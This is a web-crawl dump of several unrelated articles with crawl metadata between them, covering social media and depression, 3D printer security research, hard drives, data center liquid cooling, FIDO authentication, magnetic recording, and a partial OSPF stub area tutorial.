https://www.sentia.ca/Blog/ArtMID/1133/ArticleID/202/Fileless-Malware-What-is-it-and-Why-Traditional-Security-Practices-Cant-Protect-Against-It
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00646.warc.gz
|
en
| 0.894368 | 1,268 | 3.265625 | 3 |
Negative social media experience
In current life style, social media have turned out to be prominent parts of life for many young people. Most people connect with social media without ceasing to think whether positive or negative. Now, researchers from Pittsburgh and West Virginia Universities jointly inspected the correlations between negative social media experience and depression in people.
In 2016, this research team filtered a group of students between the ages of 18 to 30 to check about how they use social media. Also examined the health of student’s depressive symptoms.
Chances of depressive indications
The investigation found, in each 10% increase in positive experiences on social media associated with a 4% decrease in the chances of depression indications, but sometimes the results may change randomly. Conversely, for each 10% increase in negative experiences related to a 20% increase in the chances of depression symptoms. Scientists stated, the woman had half-of higher chances of having depression symptoms compared to men.
Lead scientist, Brian Primack from Pittsburgh, founded that positive encounters on social media are not related or just marginally connected to lower depressive symptoms. However, negative experiences related to higher depression symptoms.
Researchers recommend some plans to decrease the quantity of negative communications in social media that tend to empower negative experiences. The team brings up that cyberbullying also happens between adults.
These findings may urge people to consider their online exchanges. Pushing ahead, these outcomes could assist researchers in creating approaches to mediate and counter the negative impacts while strengthening the positive ones.
|
<urn:uuid:628c7d06-cb03-4b86-b949-67ff2eb13485>
|
CC-MAIN-2022-40
|
https://areflect.com/2018/06/13/negative-social-media-experience-connected-to-depression-in-youngers/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00646.warc.gz
|
en
| 0.927355 | 303 | 2.90625 | 3 |
Security researchers have demonstrated that it is possible for hackers to make undetectable changes to 3D printed parts that could introduce defects and possibly safety risks, too.
Scientists at Rutgers University-New Brunswick and the Georgia Institute of Technology have shown that cyberattacks on 3D printers were likely to pose threats to health and safety. The researchers have also developed ways to combat them.
In a research paper, See No Evil, Hear No Evil, Feel No Evil, Print No Evil? Malicious Fill Pattern Detection in Additive Manufacturing, the researchers used cancer imaging techniques to detect intrusions and hacking of 3D printer controllers. The study was recently presented at the 26th USENIX Security Symposium held in Vancouver, Canada.
“Imagine outsourcing the manufacturing of an object to a 3D printing facility and you have no access to their printers and no way of verifying whether small defects, invisible to the naked eye, have been inserted into your object,” said Mehdi Javanmard, study co-author and assistant professor in the Department of Electrical and Computer Engineering at Rutgers University-New Brunswick. “The results could be devastating and you would have no way of tracing where the problem came from.”
The risks in undetected defective parts come from the increased use of external 3D printing facilities and services to manufacture goods. Items can be made here but there is no standard way to verify them for accuracy, the study said. The firmware in these printers may be hacked.
The study showed that 3D printers could be hacked to print out defective objects. Researchers have devised a way of detecting and combating 3D printing cyberattacks.
First, the sound and movement of the 3D printer’s extruder is monitored. “Just looking at the noise and the extruder’s motion, we can figure out if the print process is following the design or a malicious defect is being introduced,” said Saman Aliari Zonouz, an associate professor in the Department of Electrical and Computer Engineering at Rutgers University-New Brunswick.
Researchers said that they could then use MRIs or CT scans to check for defects. Tiny gold nanoparticles, acting as contrast agents, are injected into the filament and sent with the 3D print design to the printing facility. Once the object is printed and shipped back, high-tech scanning reveals whether the nanoparticles – a few microns in diameter – have shifted in the object or have holes or other defects.
“This idea is kind of similar to the way contrast agents or dyes are used for more accurate imaging of tumours as we see in MRIs or CT scans,” Javanmard said.
In the next five years, researchers will also look at other possible methods of attack on 3D printers, as well as possible defences.
On 31 October & 1 November 2017, Internet of Business will be holding its Internet of Health USA event at the Royal Sonesta in Boston, MA. This event is North America’s only conference focused 100 percent on IoT applications for health providers and payers.
|
<urn:uuid:2b1f5827-241e-4c34-a6af-7dd967bada4a>
|
CC-MAIN-2022-40
|
https://internetofbusiness.com/researchers-3d-printers-cyber-attacks/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00646.warc.gz
|
en
| 0.947894 | 634 | 3.109375 | 3 |
Welcome to another installment of Terminology Tuesday! Where we define some commonly misused and misunderstood computer terms!
Today’s term is Hard Drive.
Hard drives (HD) are used to store and retrieve all manners of digital data. This includes Word documents and pictures, spreadsheets and movies, music and everything in between. When we talk about storage space on a computer, we’re talking about the size of the HD. This size is measured in gigabytes (GB). The more GB the HD has, the more documents, pictures, songs, etc. can be held on the disk. The typical capacity for a HD is anywhere between 500GB and 1000GB (also called 1 terabyte (TB)).
Hard drives are not the only way data is stored. Most of Apple’s laptops utilize flash storage. These are the two options when it comes to storing data on a computer. The type of storage will affect the computer’s performance, so the terms hard drive and flash storage cannot be used interchangeably, even though they perform the same duties.
A downside to hard drives is that they can go bad and fail, causing data stored on them to be lost. Understanding how they work is useful in figuring out why this happens. Inside the HD, an arm reads data off of a rapidly rotating disk, similar to the way a record player reads music off of a vinyl. The moving parts in this can cause scratches to occur on the disk, making data unreadable. Bottom line: be very careful when moving computers with HDs and always make sure you back up your data to an external HD.
|
<urn:uuid:691d2daa-03c5-4cb6-b02a-2bda1d9fca8f>
|
CC-MAIN-2022-40
|
https://www.computerhardwareinc.com/terminology-tuesday-hard-drives/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00646.warc.gz
|
en
| 0.918541 | 330 | 4.0625 | 4 |
Liquid cooling for electronic components isn’t a new technology – it’s been used since before 1887 for insulating and cooling high-voltage transformers. One of the earliest uses for liquid cooling compute equipment was in the 1960s, with IBM’s System 360 computers. By the 1980s, liquid cooling was popular for supercomputers and mainframes, the early precursors to today’s data centers in terms of computer density, power use and heat generation. Now, in 2019, liquid cooling is, once again, becoming the go-to solution for data center cooling.
So how and why have cooling technologies evolved from liquid, to air, and back to liquid again?
Back in the swim
In the early days of mainframe computing, there were few alternatives to liquid cooling. The heat density of the equipment simply could not be handled with air cooling. The superior heat transfer capabilities of liquid (over 1,000x more heat capacity than air) provided mainframe manufacturers with a reliable solution.
All that changed with the introduction of complementary metal–oxide–semiconductors (CMOS). This technology radically reduced the power consumption (and therefore heat generated) by the semiconductors used to build computer systems, and it became possible to cool these systems with air, at a lower cost than liquid cooling. Over the last few decades, air cooling systems have become more efficient, as new technologies have moved the cooling system closer to the heat loads – from the perimeter of the room with computer room air conditioning (CRAC) and computer room air handlers (CRAH), into the row of racks (in-row cooling), to the back of the rack (rear-door heat exchangers). However, at the same time the heat generated by ever more powerful servers continues to escalate – pushing, and exceeding, the limits of air-cooling capabilities.
Now, the pendulum is swinging back. New applications like blockchain, artificial intelligence (AI), machine learning, and other high-performance computing applications require more powerful systems. And more powerful systems mean more heat. The once economical air cooling solutions are becoming increasingly complex and costly to build and operate, as they struggle to keep up with these new demands. At the same time, liquid cooling solutions have become increasingly cost effective, and often provide higher ROI and lower total cost of ownership than their air-cooled counterparts. These benefits are no longer limited to just high-density data centers. In fact, many of the economic benefits are realized with density as low as 15 kw per rack.
This transition back to liquid cooling started in early 2000.
Fujitsu released the GS8900 mainframe with a hybrid water cooling system
IBM released a rear-door heat exchanger for use with its dense blade servers, the first major company to start using water cooling for CMOS processors
IBM introduced the Power 575, a supercomputer using a direct cooling system, with water-cooled copper plates above the microprocessors, it’s first liquid cooled system for a mainframe since the ES/9000
CoolIT ships direct contact liquid cooling (aka, liquid-to-chip)
Green Revolution Cooling (now GRC) introduced CarnoJet, with single phase liquid immersion cooling
Iceotope launches with immersion tanks on processor blades
Two-phase immersion technology is used by crypto-miners.
These are no longer niche solutions. Data centers are now broadly adopting liquid cooling. A 2018 Uptime Institute survey revealed that 14 percent of data centers currently use some form of liquid cooling to address their needs for increased efficiency and lower operating costs. Which liquid cooling solution is right for your organization depends on a variety of factors including your rack densities, space constraints, data center or edge location requirements, if the computing systems are GPU and ASIC-based or CPU-based, server refresh cycle, and if the space is a retrofit or a new build.
Cooling the equipment is one of the major challenges of managing any dense computing environment. As new high-performance computing applications require even more power and generate more heat, they’re exceeding the capabilities of air-cooling. Liquid cooling is a cost-effective solution – offering higher return on investment and lower total cost of ownership for almost all data centers. If you haven’t investigated liquid cooling for your data center yet, now is the time.
|
<urn:uuid:f808e7a3-c43f-4b7a-b5ec-c1ba0e0fd06f>
|
CC-MAIN-2022-40
|
https://www.datacenterdynamics.com/en/opinions/ten-years-liquid-cooling/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00646.warc.gz
|
en
| 0.937112 | 920 | 3.46875 | 3 |
Maintaining the energy grid is already essential—it’s part of what keeps traffic lights functioning and security systems from failing us. There’s no denying that modern society has a reliance on electricity that makes it difficult to imagine us maintaining our quality of life without it. However, we’re on the precipice of a time where uncertainty shrouds the energy sector. The future of our energy needs, sources, and what that power will be used for isn’t clear, but what is obvious is that the security of the energy sector is going to become paramount in the near future.
Heavier Reliance on Automation
We’re on the brink of a revolution in how work is done, not too dissimilar from the Industrial Revolution. If we think of the Industrial Revolution as having replaced much of the physical burdens that manual labor jobs required, the era we’re headed into will see much less reliance on the mental labor that comes with many jobs. This means automating everything from truck drivers, to security systems, to personal assistants and secretaries. Doing this could lead to increased efficiencies and lower upfront costs for many businesses, but it also means a heavier reliance on the energy sector to keep those automated systems up and running.
Uncertainty About the Future of Energy
There’s a huge push for more forms of alternative energy to be put in place but it’s unclear what the timeline for adoption of these technologies will be. Not only do these systems offer cleaner, sustainable energy, but decentralizing energy can also address many of the traditional security concerns associated with the energy sector. Nonetheless, if we jump ship too soon and leave our traditional energy sources unprotected, it could have disastrous results.
Shifting Control of Global Energy Supply
This goes hand-in-hand with changes in energy technology. For ages, energy like oil was in the control of whoever had it. That fact alone had massive impacts on geopolitical power structures and who was able to control the global energy supply. As we move away from energy sources like oil and gas, it could cause international tension between nations. Keeping energy facilities protected in light of those potential tensions is an absolute necessity.
Improving the Energy Sector With Gatekeeper
Gatekeeper Security’s suite of intelligent optical technologies provides security personnel with the tool to detect today’s threats. Our systems help those in the energy, transportation, commercial, and government sectors protect their people and their valuables by detecting threats in time to take action. From automatic under vehicle inspection systems, automatic license plate reader systems, to on the move automatic vehicle occupant identifier, we offer full 360-degree vehicle scanning to ensure any threat is found. Throughout 30 countries around the globe, Gatekeeper Security’s technology is trusted to help protect critical infrastructure. Follow us on Facebook, Google+, and LinkedIn for updates about our technology and company.
|
<urn:uuid:85e4be60-6ad3-4a2c-8c6b-d54c3dd10add>
|
CC-MAIN-2022-40
|
https://www.gatekeepersecurity.com/blog/keeping-energy-sector-secure-becoming-even-important/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00646.warc.gz
|
en
| 0.93991 | 589 | 2.953125 | 3 |
With an enthusiastic cry google announces that super fast computing with quantum is a 100 million times faster then your regular computer
They finally cracked it. At-least they are appearing to say it. Announcing their result, google may have just told us that super fast computing with quantum is now not a dream.
The story started 2 years ago. When Google bought a D Wave 2X quantum computer . It was the starting point of their experimentation s at U.S. space agency’s Ames Research Center in Mountain View, California. After 2 year long hardwork, they have finally arrived at a desirable conclusion.
The primary was to shorten the calculating time for extremely complex problems. Now its a matter of seconds rather then years. As google has announced the calculating speed to be not a 100 not a 1000, not even a 100,000 but a 100.000.000 times faster then our regular system.
The rules are simple. They follow quantum mechanics to do computing. This makes the device much faster. Whereas normal computers transfer ‘bits’ of memory as ‘1’ and ‘0’, quantum computer uses ‘qubits’. A qubit is a unit of quantum information. It comprises of 2 states polarization system. a horizontal and one vertical. That means instead of transferring the binary bits after selecting one after the other qubit transfers both of’em at the same time.
So now as it is out. Give us your thoughts about this era of super fast computing we are about to enter.
|
<urn:uuid:dc514170-4e1f-4eb0-934c-3be607bd39d7>
|
CC-MAIN-2022-40
|
https://www.cyberpratibha.com/blog/google-cracks-super-fast-computing-with-quantum/?amp=1
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00646.warc.gz
|
en
| 0.945021 | 316 | 2.96875 | 3 |
Key-based multi-factor authentication is one of the best ways to secure access to data, to a network, or to a user account. Unlike a single-password system that grants total access if that one password is deciphered, multi-factor authentication requires more than one component to be present for full access, dramatically reducing the chances of phishing or other forms of identity theft to succeed.
Multifactor authentication can be faster, easier, and more secure than traditional single-password security systems using FIDO protocols and key pair technology.
What Is FIDO?
FIDO stands for Fast Identity Online. It is a global alliance of companies dedicated to establishing cryptographic security standards that can easily integrate into systems and with each other to eliminate the reliance on traditional knowledge-based systems (such as username/passwords). FIDO protocols embraced various security measures, including key-based biometrics such as fingerprints, voice and face recognition, security tokens, NFC cards, and other forms of key-based multi-factor authentication.
By ensuring that industry standards are established and observed, different security devices and software are compatible and interoperable, ensuring that no device or software will fail to work with another system.
What Is A Key Pair?
A key pair is a security measure that creates two digital “keys” that when used together (a “key-pair”) is used to securely grant account access in a phishing-resistant manner. There is a “public” key and a private “key” and both are required to access services successfully and read data. The public key is one that the user account uses to grant access (authenticaticates to the service that includes an encryption function, taking raw data that can be received or understood as is and encrypting it into an unreadable format.
The private key is the one that the user on a device uses for presentation and verification to decrypt data and make it once again readable. Both keys must be present for making data at rest readable to a system, and for granting access to services.
Under the FIDO protocol, a user goes through the normal registration procedure which creates a new user account while the system creates a public-private key pair for the account. Once registration is complete, any time a user wishes to access their account protected by the key pair, it requires logging in with which requires the public key, and then providing the private key to decipher the encryption and access the account and data protected within the account.
This is a much stronger form of protection against conventional phishing techniques or man-in-the-middle attacks that are used to steal user credentials, and access the “taken-over” account. By requiring two cryptographic keys, even if a bad actor can steal the public “account” key they can go no further because without the private key they cannot unlock the account or access its data.
If you’re interested in using FIDO key pairs and multi-factor authentication to protect users on devices accessing services and data, read here to learn more.
|
<urn:uuid:de90224f-2f9b-49f5-884c-b39058fc073d>
|
CC-MAIN-2022-40
|
https://noknok.com/multi-factor-authentication-fido-key-pairs-increase-security/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00046.warc.gz
|
en
| 0.917452 | 636 | 3.21875 | 3 |
An international team of researchers led by the University of York in England has demonstrated fast data recording on hard drives using heat.
They used an ultra-short pulse of heat to reverse the poles in a ferrimagnet in order to write the data.
“It was, until now, generally accepted that a directional stimulus must reverse magnetization,” University of York scientist Thomas Ostler told TechNewsWorld. “We have now shown that there is something missing in the conventional picture. Using very short heat pulses of around 50 femtoseconds, we have found a way to reverse magnetization without the need for a directional stimulus.”
Cut up one second into 1 billion pieces, and take one millionth of one of those pieces and you have a femtosecond.
What the Researchers Found
The researchers used magnetic disks of down to 500 nm in diameter.
The experiments used a glass substrate with an insulating seed layer. The magnetic signal was read through the rear of the sample while the heat was applied from the top.
Currently, the hard drive industry is looking into using heat assisted magnetic recording (HAMR), which “is a combination of traditional giant magneto-resistive head technology with laser technology,” John Monroe, a research vice president at Gartner, told TechNewsWorld.
However, there is “still some way to go before femtosecond lasers could be employed in hard drives,” Ostler said. “Our results are a proof of principle and require very expensive femtosecond lasers that can generate very fast pulses.”
What Is HAMR?
HAMR magnetically records data on media made from highly stable magnetic compounds such as iron platinum alloy after first heating the material with lasers.
These magnetic compounds can store single bits in a much smaller area than current technology does, provided they’re heated first.
HAMR was developed by Fujitsu in 2006.
Proponents of HAMR claim it should be able to achieve a storage density of 10 terabytes of data per square inch, Gartner’s Monroe said. However, critics contend that the cost of creating highly coordinated laser and read/write head technology, combined with the danger of data loss from accidentally heating adjacent storage bits, makes it impractical.
The process used by the University of York’s team might get around the heat problem because “the laser pulse is so fast that the demagnetization process is very different from that occurring following a slow increase in temperature,” Ostler pointed out. However, exactly how this works is still being studied.
The researchers’ process could change the face of HAMR. A strong field is required to reverse magnetization using HAMR, but “our technology only requires the use of heat,” Ostler said. This might be able to reduce the power consumption required when HAMR technology is employed.
Extending the Limits of Storage
Existing storage technology, which employs perpendicular magnetic recording (PMR), is 700 GB per square inch, Fang Zhang, a research analyst at IHS iSuppli, told TechNewsWorld. The upper limit of this technology is 1 terrabyte per square inch.
The upper limit for HAMR is thought to be 10 terabytes per square inch. However, “right now there are many technical issues that need to be resolved” so that limit has not yet been attained, Zhang pointed out.
It’s not yet clear whether the technology used by the team led by the University of York can exceed HAMR’s limits.
“The fine details of how this physical phenomena would be engineered in a device are not yet known,” Ostler said. “However, we envisage using near-field optics to focus the light from the laser onto very specific areas of the disc as the disc is spinning. Thus one pulse per bit would be required.”
Near-field optics looks at configurations that depend on the passage of light between very small elements with one or more dimensions smaller than the wavelength of that light.
Survival of the Fittest
Hard drive makers may eventually need a new technology in order to survive.
“Due to the uptake of solid state drive and flash storage, hard disk vendors are facing a decline,” Charles King, principal analyst at Pund-IT, told TechNewsWorld. “A commercially viable, affordable HAMR solution could literally breathe life into the troubled HDD industry.”
The hard drive industry has been wrestling for some time with different solutions to the problem.
Seagate opted for HAMR, but some other vendors, including Western Digital, selected nanoimprint lithography (NIL). This is also known as “bit patterned recording.”
“Both technologies remain in heavy development throughout the industry,” Mark Geenen, chairman of the board of the International Disk Drive Equipment and Materials Association (IDEMA), told TechNewsWorld. “HAMR is ahead slightly.”
|
<urn:uuid:3fc66904-ab3a-441b-9c9e-dae96811158c>
|
CC-MAIN-2022-40
|
https://www.linuxinsider.com/story/storage-tech-sizzles-with-hot-hot-hard-drives-74374.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00046.warc.gz
|
en
| 0.939938 | 1,043 | 3.078125 | 3 |
OSPF is easy to understand – once you get over the FIVE BILLION new acronyms and buzzwords that you need to memorise.
Unfortunately, the people who write study guides frequently insist on using as many of those buzzwords as they can in the space of a minute, so you end up having to wrap your head around sentences like “We filter Type 5 LSAs in the NSSA at the ABR, though the ASBR can still generate Type 7s and they’ll be swapped for Type 5s on egress to the backbone”. When I hear sentences like that, I conclude that it’s actually a good thing when nerds get bullied.
Stub areas are a good example of something that isn’t too complicated – unless you insist on explaining it using all the jargon under the sun, in which case it can be daunting. So, in this post I’ll start by explaining what a stub area is, without using any OSPF jargon. We’ll take it slow, like new lovers, or someone cooking an expensive turkey.
Then, once we’ve got the idea down, we’ll start to talk about the various LSAs (Link-State Advertisements) that our routers generate, to see exactly what’s going on under the hood when we configure this area type. Let’s do it!
(Hi there CCNP students! This blog mainly uses Juniper output, but shows you both Cisco and Juniper config examples. The behaviour is almost exactly the same between the two vendors, and on the rare occasions where the behaviour is different, I’ll let you know how both works. And hey, if you’re curious to see how Juniper config works, you might well enjoy my Junos for Cisco IOS Engineers series. Gosh I treat you well!)
WHAT IS AN OSPF STUB AREA? WHY MIGHT WE NEED THEM?
Imagine a large network, perhaps one that spans across an entire country, or one that goes all the way to the moon. Either way, this network probably contains hundreds of links, and thousands of prefixes. Is it exciting for you to think about a network so big? It is? That’s nice. You can keep on thinking about it if you like? If it’s making you happy? No need to rush away from that lovely thought.
What would such a network look like in practice? You’ve probably seen already in your OSPF studies that sometimes you might just have one large flat Area 0 backbone, while other times you might additionally have any number of branch office contained in their own OSPF area, attached to the backbone.
In that scenario, where you have smaller areas attached to the backbone area, here’s a question for you: do those branch offices really need to know every single prefix in your entire OSPF network?
The answer to that question depends on a lot of factors.
For example, does the branch area have just the one WAN circuit out to the rest of the network, or does it instead have multiple WAN links? If it is indeed just the one link, maybe you’d be better off with a single default route, instead of thousands of prefixes in your routing table which all ultimately point out of the same interface.
Another example: perhaps the routers at that branch are very old or cheap, and have limited memory? Sounds like another good reason to just have a default route, even if you’ve got multiple WAN links. After all, if you’ve got a $60 DSL router that can allegedly run OSPF, I’d bet money that its memory is pretty small. Just because a router can run OSPF in theory, doesn’t mean that it will run it well.
In those examples we’re thinking about replacing everything with just a default route. But if you’ve got a couple of links out, there might be situations where we actually do want to let certain prefixes through, to give us a balance between more optimal routing decisions vs keeping our router’s memory light. Perhaps we point a default route down one interface, and then we choose just a few more specific routes to “leak” into the area. Not everything: just our most important prefixes, let’s say. If you’ve got cheap routers that aren’t powerful, and you’ve got multiple WAN links out, that would be a perfect candidate for this scenario.
So then the next question is: how can we filter out the prefixes we don’t care about? How do we take just a small sub-set of the total prefixes in our OSPF domain, and advertise only them into this smaller area?
There’s a few methods available to us. One is to do it manually, using some kind of access list/prefix list, or a routing policy. Not a bad idea – but prone to errors, particularly if new prefixes appear elsewhere in the network which slip through your list.
So how about this: what if there was a way of just saying “filter out all prefixes that didn’t originate in OSPF”, or maybe even “filter out all prefixes that don’t originate from this area”.
Well, as it happens, that’s exactly what the different kinds of “stub area” do!
It turns out that the way OSPF advertises prefixes from other areas is different from the way OSPF advertises prefixes from within the area your router is in. The same is true for prefixes that didn’t originate from OSPF: redistributed prefixes are advertised in a slightly different way too. This “different way” involves using different types of Link-State Advertisement. You might remember that these LSAs are like the building blocks of the entire OSPF database, containing all the topology/prefix/cost information – and knowing the different types of LSAs that are generated gives us the power to choose which LSA types we want to let in, and which ones we want to get rid of.
Later on we’ll talk more about these LSA types. For now, let’s build a lab.
CHECK OUT MY SWEET TOPOLOGY
Here’s a silly topology I’ve made to highlight the different kinds of area we can choose from, and what happens when we choose them. It’s a perfect topology for a lab – but if you ever see anyone design a network like this in real life, fire them.
You can see that we have a small Area 0, with two other small areas attached to it: Area 1, and Area 2. If something in Area 1 wants to talk to something in Area 2, the traffic has to go via the Area 0 backbone. That’s the law!
Router 4 itself is home to six IP ranges: 188.8.131.52/24, 184.108.40.206/24, and so on. These ranges all live within Area 2. Keep an eye out for these prefixes when we look at Router 1’s routing table in a moment, because we’re going to do some magic with them.
Router 5 is outside of our OSPF network. And hey, guess what: Router 5 is also hosting six IP ranges. What are the chances of these ranges starting with a first octet of 5? One hundred percent chance! Yep: 220.127.116.11/24, 18.104.22.168/24 and so on.
Router 4 is learning these six prefixes by BGP, and there’s a policy on Router 4 to re-advertise them into OSPF. This makes Router 4 an ASBR, or Autonomous System Boundary Router. Calling a router an ASBR is basically a fancy way of saying that the router lives on the border (ie the boundary) of the network, connecting the OSPF world to the BGP world.
WARNING: In the real world you’ll want to be very very very very VERY careful about redistributing BGP into OSPF. But this is just a lab, so let’s throw caution to the wind.
In this topology, our boundary router actually does live on the boundary of the network. However, it doesn’t have to. In fact, if you have static routes on any box, and you redistribute them into OSPF, then technically that router has been promoted to being an ASBR! Even if that router lives slap-bang in the middle of the network, OSPF would still call it a “boundary” router. This makes sense when you think of static routes as being their own protocol. The router is acting as the boundary between OSPF and the static routes, like a bouncer at a night-club acting as the boundary between “you” and “getting your funk on”.
LET’S MAKE FRIENDS WITH ROUTER 1’S ROUTING TABLE
Let’s look at the routing table on Router 1, a router in Area 1.
(Hey there CCNP students: notice in this screenshot that in Junos, we just type “show route” rather than “show ip route”.
Also hey there: do you see how all the IPs are just listed in numerical order, rather than in a seemingly random order that’s then sub-divided by the extremely legacy “classful addressing” system which hasn’t been used in about 25 years, like IOS insists on doing it? I don’t know about you, but I find this layout FAR easier to read!)
Router 1’s routing table is pretty big, considering that Area 1 only contains one and a half routers! It’s clear that Router 1 knows about every single prefix in the entire network, including all six of the 4.1.x.x/24 prefixes from Router 4, and also all six of the 5.1.x.x/24 prefixes that were coming in from BGP.
(CCNP students: notice that OSPF’s administrative distance (what Junos calls the “route preference”) is different in Junos: 10 for regular OSPF, 150 for external OSPF.)
What we’ve learned here is that the default behaviour in OSPF is to take all prefixes from one area, and advertise them to another area. The border router between Area 0 and Area 2 takes all the prefixes in Area 2, and redistributes them into the backbone. Then, the border router between Area 1 and Area 0 takes all the prefixes in Area 0, and redistributes them into Area 1.
You can imagine that in the real world, this default behaviour would mean that a small branch router could potentially be learning thousands and thousands of prefixes! Is that really necessary? No sir/madam!
So, let’s make area 1 a “stub area”, and see what happens. How do we do that? Whether we’re using Juniper or Cisco, it’s hella easy. We just need to add the config below onto every box in area 1. It’s really important that it’s added everywhere in Area 1, otherwise our adjacencies won’t come up.
If you’re rocking dem fine Juniper boxes, it’s one command:
root@Router_1# set protocols ospf area 1 stub
As for Cisco IOS, it’s just as easy:
R1(config)#router ospf 1 R1(config-router)#area 1 stub
What’s the result of this config? To find out, let’s look at the routing table on Router 1 AFTER we turned Area 1 into a stub.
Give yourself ten points if you’ve spotted the difference: all the prefixes from the 5.1.x.x/24 BGP ranges are gone!
Our routing table is significantly lighter now. Scale this out to many thousands of external prefixes, and the value of a stub area becomes clear.
What have we learned? “Stub areas” block any prefixes that meet these two conditions: a) they’re being passed from Area 0 into the stub area, and b) they originally came from another protocol, redistributed into OSPF.
Remember, static routes count as “another protocol”. Folks often forget this, and end up filtering out prefixes they don’t mean to filter out!
In the next section we’re going to see how the different types of Link-State Advertisement are used to make this filtering a breeze.
Before we move on though, you might be wondering: it’s not much use filtering out those prefixes if we don’t have some alternative way of getting to them. Perhaps we need a summary prefix like a /22, or even a default route?
Interestingly, if Router 2 were a Cisco, it would actually advertise a default route by, er, default! It’s the standard behaviour, no extra config needed. On the other hand, Junos doesn’t assume that you want a default route. Junos leaves you to configure one if you do.
Luckily, getting Junos Router 2 to advertise this default route into Area 1 is as simple as adding two extra words to the command we typed earlier:
root@Router_2# set protocols ospf area 1 stub default-metric 10
Neither vendor’s behaviour is better, or right, or wrong. What matters is to know the default behaviours of each vendor, and know when to override them. Truly, this attitude is the solution to a more peaceful and better world.
LET’S REVISE TYPE 1 AND TYPE 2 LSAs
Let’s talk more about these Link-State Advertisements that OSPF creates.
An LSA is basically like a database item that a router generates and then advertises to all other routers, that tells the rest of the network some interesting information about that router’s presence on the network, for example:
- The router’s unique ID
- What links are attached to the router
- What IP networks live on those links
- What the metric/cost is on that link
- Whether the link is attached to a shared segment, like an ethernet switch with multiple routers on the subnet
These LSAs are like pieces of a jigsaw puzzle. When every router has received every single LSA from every box in its own area, every router in the area can put them together to create the entire area’s topology – and crucially, every router in the area will have exactly the same set of LSAs, and therefore exactly the same view of the network.
There are lots of different kinds of LSA, and each one serves a different purpose.
For example, you might have learned already that a Type 1 LSA is also known as a Router LSA. Routers generates this LSA to say what the router’s ID is, what links are attached to it, and what prefixes are on those links. It will also list the cost of the link. Type 1 Router LSAs are one of the essential building blocks for creating the topology itself.
However, it’s not the end of the topology story: if a link is part of a shared segment, like that ethernet switch we mentioned a moment ago, then there’s actually a special LSA that describes this shared network, and lists all the links attached to it. It’s called a Type 2 LSA, which is also known as the Network LSA.
I want to stay focused on stub areas for now, so what I’m about to say is an oversimplification: a Type 2 Network LSA helps to simplify how routers calculate best paths.
Imagine fifteen routers on a shared segment, all connected to a switch. Without this special Type 2 LSA, the topology would logically look like each of these 15 routers had a direct point-to-point connection to every other router on the LAN. That’s a lot of links! Instead, the Type 2 Network LSA makes it look like there’s an invisible zero-cost router in the middle of it all – which, in effect, there is! There’s a switch, and all routers connect to it.
If you’ve got just the one area, then chances are that you only need those two kinds of LSA: one to advertise the routers themselves and the links they’re hosting, and one to advertise the existence of shared broadcast segments. Indeed, if you configure all your ethernet links as point-to-point, you could actually have a network made up entirely of Type 1 LSAs. Pretty simple!
LET’S REVISE TYPE 3 LSAs
However, if you’ve got multiple areas, like in our diagram, then chances are you might also have a few Type 3 LSAs, otherwise known as Summary LSAs.
Don’t be fooled by the name: the word “summary” here doesn’t refer to summarising multiple subnets into a single bigger subnet. Instead, the summary LSA is actually summarising the topology information.
In our lab network, Area 1 doesn’t need to know the topology of Area 0 and Area 2. Area 1 possibly needs to know about the prefixes in those areas – but not the topology. Indeed, that’s exactly why we’ve chosen to put Area 1 in it own unique area. A link going down in Area 0 or Area 2 shouldn’t mean that Area 1 needs do any new best-path calculations.
But what definitely should happen is that the relevant prefixes need to disappear from Area 1.
With that in mind, the router connecting Area 1 and Area 0 – the Area Border Router, or ABR – takes every prefix it’s learned from Area 0, and re-generates them as new Link-State Advertisements pointing to itself. It then advertises these prefixes into Area 1 via these special Type 3 Summary LSAs. In our topology, you can think of Router 2 almost as if it’s taking these 4.1.x.x/24 prefixes, and changing the next-hop to itself. Instead of telling Area 1 that these IPs live on Router 4, Router 2 is saying “don’t worry about where these prefixes live. All you need to know is that you can get to them via me, and I’ll take care of the rest.”
LET’S REVISE TYPE 5 LSAs
There’s one more Link-State Advertisement type that I want you to know about: External LSAs, otherwise known as Type 5 LSAs. As the name says, External LSAs represent IPs that live outside of the network. They’re generated by the border router, aka the ASBR, aka the Autonomous System Boundary Router – the router doing the redistribution.
At this point, many folks often wonder “Does OSPF actually need so many LSA types? This seems excessive!”. Well, you could argue that OSPF doesn’t need them – but by having many different types, it actually gives us some useful advantages.
For example, by having an LSA specifically for IPs that are external to OSPF (the Type 5 External LSA), it means that if we want to filter out these external prefixes, we don’t need to do anything complicated, like making access lists or prefix lists – all we have to do is block Type 5 LSAs! “Don’t give me any Type 5 LSAs”, our plucky router says. “I’m on a diet. Type 5 LSAs are empty calories to me.” This is what the routers say. This is literally what they say.
And, as you might have guessed by now, all we had to do to filter out these Type 5 LSAs was to configure Area 1 as a stub area. Like a lot of things in networking, the theory involves a lot of reading – but the actual configuration is one single line of config.
TOTALLY STUBBY AREAS
But it doesn’t stop there, because there’s another kind of stub area that can block even more stuff: Totally Stubby Areas. This area not only blocks the Type 5 (External) LSAs, but it also blocks Type 3 (Summary) LSAs too. Do you remember we talked about those a moment ago? They’re the ones that summarise the topology, and just advertise the prefixes of one area into another area.
If you configure an area to be Totally Stubby, you’ll get rid of both Type 3 and Type 5 LSAs. And just like a stub area, it’s super easy to configure.
In Junos, we add this extra config below to Router 2, the Area Border Router. We only need to add this extra config onto the ABR, because it’s this box that’s deciding whether to re-advertise the Type 3 Summary LSAs into Area 1.
